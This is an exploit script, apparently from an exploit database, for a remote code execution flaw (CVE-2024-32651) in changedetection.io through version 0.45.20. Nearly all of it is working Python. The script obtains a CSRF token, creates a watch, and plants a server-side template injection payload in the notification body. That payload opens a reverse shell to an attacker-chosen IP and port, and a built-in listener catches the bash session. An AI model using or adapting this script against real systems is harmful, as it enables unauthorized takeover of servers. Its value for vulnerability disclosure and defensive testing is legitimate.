    # Exploit Title: changedetection <= 0.45.20 Remote Code Execution (RCE)# Date: 5-26-2024# Exploit Author: Zach Crosman (zcrosman)# Vendor Homepage: changedetection.io# Software Link: https://github.com/dgtlmoon/changedetection.io# Version: <= 0.45.20# Tested on: Linux# CVE : CVE-2024-32651from pwn import *import requestsfrom bs4 import BeautifulSoupimport argparsedef start_listener(port):    listener = listen(port)    print(f"Listening on port {port}...")    conn = listener.wait_for_connection()    print("Connection received!")    context.newline = b'\r\n'    # Switch to interactive mode    conn.interactive()def add_detection(url, listen_ip, listen_port, notification_url=''):    session = requests.Session()        # First request to get CSRF token    request1_headers = {        "Cache-Control": "max-age=0",        "Upgrade-Insecure-Requests": "1",        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",        "Accept-Encoding": "gzip, deflate",        "Accept-Language": "en-US,en;q=0.9",        "Connection": "close"    }    response = session.get(url, headers=request1_headers)    soup = BeautifulSoup(response.text, 'html.parser')    csrf_token = soup.find('input', {'name': 'csrf_token'})['value']    print(f'Obtained CSRF token: {csrf_token}')    # Second request to submit the form and get the redirect URL    add_url = f"{url}/form/add/quickwatch"    add_url_headers = {  # Define add_url_headers here        "Origin": url,        "Content-Type": "application/x-www-form-urlencoded"    }    add_url_data = {        "csrf_token": csrf_token,        "url": "https://reddit.com/r/baseball",        "tags": '',        "edit_and_watch_submit_button": "Edit > Watch",        "processor": "text_json_diff"    }    post_response = session.post(add_url, headers=add_url_headers, data=add_url_data, allow_redirects=False)    # Extract the URL from the Location header    if 'Location' in post_response.headers:        redirect_url = post_response.headers['Location']        print(f'Redirect URL: {redirect_url}')    else:        print('No redirect URL found')        return    # Third request to add the changedetection url with ssti in notification config    save_detection_url = f"{url}{redirect_url}"    save_detection_headers = {  # Define save_detection_headers here        "Referer": redirect_url,        "Cookie": f"session={session.cookies.get('session')}"    }    save_detection_data = {        "csrf_token": csrf_token,        "url": "https://reddit.com/r/all",        "title": '',        "tags": '',        "time_between_check-weeks": '',        "time_between_check-days": '',        "time_between_check-hours": '',        "time_between_check-minutes": '',        "time_between_check-seconds": '30',        "filter_failure_notification_send": 'y',        "fetch_backend": 'system',        "webdriver_delay": '',        "webdriver_js_execute_code": '',        "method": 'GET',        "headers": '',        "body": '',        "notification_urls": notification_url,        "notification_title": '',        "notification_body": f"""        {{% for x in ().__class__.__base__.__subclasses__() %}}        {{% if "warning" in x.__name__ %}}        {{{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\\"{listen_ip}\\",{listen_port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\\"/bin/bash\\")'").read()}}}}        {{% endif %}}        {{% endfor %}}        """,        "notification_format": 'System default',        "include_filters": '',        "subtractive_selectors": '',        "filter_text_added": 'y',        "filter_text_replaced": 'y',        "filter_text_removed": 'y',        "trigger_text": '',        "ignore_text": '',        "text_should_not_be_present": '',        "extract_text": '',        "save_button": 'Save'    }    final_response = session.post(save_detection_url, headers=save_detection_headers, data=save_detection_data)    print('Final request made.')if __name__ == "__main__":    parser = argparse.ArgumentParser(description='Add detection and start listener')    parser.add_argument('--url', type=str, required=True, help='Base URL of the target site')    parser.add_argument('--port', type=int, help='Port for the listener', default=4444)    parser.add_argument('--ip', type=str, required=True, help='IP address for the listener')    parser.add_argument('--notification', type=str, help='Notification url if you don\'t want to use the system default')    args = parser.parse_args()    add_detection(args.url, args.ip, args.port, args.notification)    start_listener(args.port)

Tag

#vulnerability